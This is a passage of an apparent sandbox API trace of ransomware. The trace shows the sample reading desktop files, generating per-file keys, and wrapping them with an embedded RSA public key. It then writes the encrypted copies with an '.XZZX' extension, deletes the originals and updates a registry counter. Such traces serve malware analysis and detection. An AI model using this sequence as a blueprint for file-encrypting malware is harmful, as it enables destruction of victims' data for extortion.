nNumberOfBytesToWrite=0xac93, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xac93, lpOverlapped=0x0) returned 1 [0170.111] SetFilePointer (in: hFile=0x9dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xac93 [0170.111] WriteFile (in: hFile=0x9dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.111] SetFilePointer (in: hFile=0x9dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xac98 [0170.111] WriteFile (in: hFile=0x9dc, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x12, lpOverlapped=0x0) returned 1 [0170.111] SetFilePointer (in: hFile=0x9dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xacaa [0170.111] WriteFile (in: hFile=0x9dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.111] SetFilePointer (in: hFile=0x9dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xacaf [0170.111] SetErrorMode (uMode=0x1) returned 0x1 [0170.111] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0170.111] OutputDebugStringW (lpOutputString="end") [0170.111] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.111] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0170.111] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a57a0) returned 1 [0170.112] CryptImportPublicKeyInfo (in: hCryptProv=0x43a57a0, dwCertEncodingType=0x1, pInfo=0x437fe58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437fe88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437fe90*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372d38) returned 1 [0170.112] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.112] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0170.112] CryptEncrypt (in: hKey=0x4372d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0170.112] CryptEncrypt (in: hKey=0x4372d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5828*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5828*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0170.112] WriteFile (in: hFile=0x9dc, lpBuffer=0x43a5828*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5828*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0170.113] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0170.113] WriteFile (in: hFile=0x9dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.113] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0170.113] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0170.113] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9e4) returned 0x0 [0170.113] RegQueryValueExW (in: hKey=0x9e4, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x100, lpcbData=0x29adfdc*=0x4) returned 0x0 [0170.113] RegCloseKey (hKey=0x9e4) returned 0x0 [0170.113] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9e4) returned 0x0 [0170.113] RegSetValueExW (in: hKey=0x9e4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x101, cbData=0x4 | out: lpData=0x29adfec*=0x101) returned 0x0 [0170.113] RegCloseKey (hKey=0x9e4) returned 0x0 [0170.113] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.113] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.114] CloseHandle (hObject=0x9dc) returned 1 [0170.114] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0170.114] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0170.114] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\rVKi.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\rvki.xlsx")) returned 1 [0170.115] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\rVKi.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\rvki.xlsx")) returned 0 Thread: id = 582 os_tid = 0x6d8 [0170.116] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.116] lstrcpyW (in: lpString1=0x29af460, lpString2="UcgnfCPkkGAfI8Infh.pdf" | out: lpString1="UcgnfCPkkGAfI8Infh.pdf") returned="UcgnfCPkkGAfI8Infh.pdf" [0170.116] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0170.116] SetErrorMode (uMode=0x1) returned 0x1 [0170.116] lstrcpyW (in: lpString1=0x29af860, lpString2="UcgnfCPkkGAfI8Infh.pdf" | out: lpString1="UcgnfCPkkGAfI8Infh.pdf") returned="UcgnfCPkkGAfI8Infh.pdf" [0170.116] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xde26bec0, Data2=0x3736, Data3=0x4205, Data4=([0]=0x93, [1]=0x97, [2]=0x5c, [3]=0x2c, [4]=0x1f, [5]=0xba, [6]=0x1f, [7]=0xea))) returned 0x0 [0170.117] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\UcgnfCPkkGAfI8Infh.pdf") returned 84 [0170.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0170.117] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\2F277C800E3D000EDE26BEC010D7E456.XZZX") returned 99 [0170.117] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="XZZX") returned 0x0 [0170.117] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\UcgnfCPkkGAfI8Infh.pdf", dwFileAttributes=0x20) returned 1 [0170.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\UcgnfCPkkGAfI8Infh.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\ucgnfcpkkgafi8infh.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e0 [0170.117] ReadFile (in: hFile=0x9e0, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x10141, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x10141, lpOverlapped=0x0) returned 1 [0170.118] CloseHandle (hObject=0x9e0) returned 1 [0170.118] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0170.119] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0170.119] SetErrorMode (uMode=0x1) returned 0x1 [0170.119] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0170.119] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a58b0) returned 1 [0170.121] CryptGenKey (in: hProv=0x43a58b0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0170.223] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.223] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.223] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.224] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0170.224] CryptDestroyKey (hKey=0x4372978) returned 1 [0170.224] CryptReleaseContext (hProv=0x43a58b0, dwFlags=0x0) returned 1 [0170.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\2F277C800E3D000EDE26BEC010D7E456.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\2f277c800e3d000ede26bec010d7e456.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e0 [0170.225] WriteFile (in: hFile=0x9e0, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x10141, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x10141, lpOverlapped=0x0) returned 1 [0170.226] SetFilePointer (in: hFile=0x9e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10141 [0170.226] WriteFile (in: hFile=0x9e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.227] SetFilePointer (in: hFile=0x9e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10146 [0170.227] WriteFile (in: hFile=0x9e0, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2c, lpOverlapped=0x0) returned 1 [0170.227] SetFilePointer (in: hFile=0x9e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10172 [0170.227] WriteFile (in: hFile=0x9e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.227] SetFilePointer (in: hFile=0x9e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10177 [0170.227] SetErrorMode (uMode=0x1) returned 0x1 [0170.227] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0170.227] OutputDebugStringW (lpOutputString="end") [0170.227] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.227] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0170.227] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a58b0) returned 1 [0170.228] CryptImportPublicKeyInfo (in: hCryptProv=0x43a58b0, dwCertEncodingType=0x1, pInfo=0x43a2bf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a2c20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a2c28*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3d11398) returned 1 [0170.228] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.228] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0170.228] CryptEncrypt (in: hKey=0x3d11398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0170.229] CryptEncrypt (in: hKey=0x3d11398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5938*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5938*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0170.229] WriteFile (in: hFile=0x9e0, lpBuffer=0x43a5938*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5938*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0170.229] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0170.229] WriteFile (in: hFile=0x9e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.229] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0170.229] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0170.229] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9e8) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x9e8, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x101, lpcbData=0x29adfdc*=0x4) returned 0x0 [0170.229] RegCloseKey (hKey=0x9e8) returned 0x0 [0170.229] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9e8) returned 0x0 [0170.229] RegSetValueExW (in: hKey=0x9e8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x102, cbData=0x4 | out: lpData=0x29adfec*=0x102) returned 0x0 [0170.229] RegCloseKey (hKey=0x9e8) returned 0x0 [0170.229] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.230] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.230] CloseHandle (hObject=0x9e0) returned 1 [0170.230] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0170.230] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0170.230] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\UcgnfCPkkGAfI8Infh.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\ucgnfcpkkgafi8infh.pdf")) returned 1 [0170.231] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\UcgnfCPkkGAfI8Infh.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\ucgnfcpkkgafi8infh.pdf")) returned 0 Thread: id = 583 os_tid = 0x724 [0170.265] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.265] lstrcpyW (in: lpString1=0x29af460, lpString2="XiCIIZYNum_VSBs.wav" | out: lpString1="XiCIIZYNum_VSBs.wav") returned="XiCIIZYNum_VSBs.wav" [0170.265] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0170.265] SetErrorMode (uMode=0x1) returned 0x1 [0170.265] lstrcpyW (in: lpString1=0x29af860, lpString2="XiCIIZYNum_VSBs.wav" | out: lpString1="XiCIIZYNum_VSBs.wav") returned="XiCIIZYNum_VSBs.wav" [0170.265] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xb4d24c9f, Data2=0xa2fd, Data3=0x4961, Data4=([0]=0x94, [1]=0xe1, [2]=0x5b, [3]=0x6b, [4]=0x62, [5]=0xc1, [6]=0x37, [7]=0xb8))) returned 0x0 [0170.265] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\XiCIIZYNum_VSBs.wav") returned 81 [0170.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0170.265] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\C85257232EB7E6DDB4D24C9F3152CB25.XZZX") returned 99 [0170.265] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="XZZX") returned 0x0 [0170.265] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\XiCIIZYNum_VSBs.wav", dwFileAttributes=0x20) returned 1 [0170.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\XiCIIZYNum_VSBs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\xiciizynum_vsbs.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e4 [0170.266] ReadFile (in: hFile=0x9e4, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xf206, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xf206, lpOverlapped=0x0) returned 1 [0170.266] CloseHandle (hObject=0x9e4) returned 1 [0170.267] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0170.267] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0170.267] SetErrorMode (uMode=0x1) returned 0x1 [0170.267] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0170.267] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a59c0) returned 1 [0170.269] CryptGenKey 